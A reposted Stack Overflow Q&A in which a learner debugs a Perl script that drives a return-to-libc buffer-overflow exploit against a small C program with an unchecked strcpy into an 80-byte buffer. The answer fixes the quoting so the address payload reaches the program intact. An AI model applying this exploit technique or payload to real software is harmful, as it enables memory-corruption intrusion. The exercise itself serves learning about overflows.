gpt4 book ai didi

perl - 将十六进制字符作为参数传递的正确方法 - system()

转载 作者:行者123 更新时间:2023-12-01 08:34:24 25 4
gpt4 key购买 nike

我正在处理缓冲区溢出问题,并且正在尝试执行返回 libc 漏洞。为了帮助我,我设计了以下 perl 脚本:

#!/usr/bin/perl

for ($i = 1; $i < 200; $i++) {
print "count: $i\n";
system("echo 1 | ./vuln " . "A"x$i . "\x20\x83\x04\x08AAAA\x5c\xf9\xff\xbf");
}

这是我的目标代码(./vuln):

#include<stdio.h>
#include<string.h>

main( int argc, char **argv)
{
char buffer[80];
printf("%d\n%s\n", strlen(argv[1]), argv[1]);
getchar();
strcpy(buffer, argv[1]);
return 1;
}

这是脚本的输出:

count: 1
1
A
count: 2
2
AA
count: 3
3
AAA
count: 4
4
AAAA
count: 5
5
AAAAA

这表明最后连接的字符串(包含大量十六进制字符的字符串)的任何部分都没有成功作为参数传递。

我在这里做错了什么?

最佳答案

试试这个:

system("echo 1 | ./vuln '" . "A"x$i . "\x20\x83\x04\x08AAAA\x5c\xf9\xff\xbf'");

0x20 是空格,因此没有引号之后的所有内容都是一个单独的参数。

关于perl - 将十六进制字符作为参数传递的正确方法 - system(),我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/13571014/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com